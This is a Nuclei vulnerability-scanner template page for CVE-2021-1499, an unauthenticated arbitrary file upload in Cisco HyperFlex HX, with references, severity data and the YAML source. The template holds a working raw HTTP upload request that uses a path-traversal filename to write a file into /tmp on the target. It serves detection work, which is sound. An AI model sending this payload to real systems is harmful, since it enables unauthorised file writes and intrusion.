Skip to content
Nuclei Templates

Cisco HyperFlex HX Data Platform - Arbitrary File Upload

ID: CVE-2021-1499

Severity: medium

Author: gy741

Tags: cve2021,cve,fileupload,intrusive,packetstorm,cisco

Description

Section titled “Description”

Cisco HyperFlex HX Data Platform contains an arbitrary file upload vulnerability in the web-based management interface. An attacker can send a specific HTTP request to an affected device, thus enabling upload of files to the affected device with the permissions of the tomcat8 user.

YAML Source

Section titled “YAML Source”
id: CVE-2021-1499


info:
  name: Cisco HyperFlex HX Data Platform - Arbitrary File Upload
  author: gy741
  severity: medium
  description: Cisco HyperFlex HX Data Platform contains an arbitrary file upload vulnerability in the web-based management interface. An attacker can send a specific HTTP request to an affected device, thus enabling upload of files to the affected device with the permissions of the tomcat8 user.
  impact: |
    Allows an attacker to upload and execute arbitrary files on the target system
  remediation: |
    Apply the necessary security patches or updates provided by Cisco
  reference:
    - https://swarm.ptsecurity.com/cisco-hyperflex-how-we-got-rce-through-login-form-and-other-findings/
    - https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-hyperflex-upload-KtCK8Ugz
    - http://packetstormsecurity.com/files/163203/Cisco-HyperFlex-HX-Data-Platform-File-Upload-Remote-Code-Execution.html
    - https://nvd.nist.gov/vuln/detail/CVE-2021-1499
    - https://github.com/Z0fhack/Goby_POC
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
    cvss-score: 5.3
    cve-id: CVE-2021-1499
    cwe-id: CWE-306
    epss-score: 0.96279
    epss-percentile: 0.99533
    cpe: cpe:2.3:h:cisco:hyperflex_hx220c_af_m5:-:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: cisco
    product: hyperflex_hx220c_af_m5
  tags: cve2021,cve,fileupload,intrusive,packetstorm,cisco


http:
  - raw:
      - |
        POST /upload HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Accept-Encoding: gzip, deflate
        Content-Type: multipart/form-data; boundary=---------------------------253855577425106594691130420583
        Origin: {{RootURL}}
        Referer: {{RootURL}}


        -----------------------------253855577425106594691130420583
        Content-Disposition: form-data; name="file"; filename="../../../../../tmp/passwd9"
        Content-Type: application/json


        MyPasswdNewData->/api/tomcat


        -----------------------------253855577425106594691130420583--


    matchers-condition: and
    matchers:
      - type: word
        words:
          - '{"result":'
          - '"filename:'
          - '/tmp/passwd9'
        condition: and


      - type: word
        part: header
        words:
          - "application/json"


      - type: status
        status:
          - 200
# digest: 4a0a00473045022100d79198b08bbde63516ebc22e61010601c94397ad1bce287a7d1e7e4be8c74c0e02202c2bbab7a02fc970ef63156092701f6015124a4a62520513354cd392c2c291b7:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-1499.yaml"

View on Github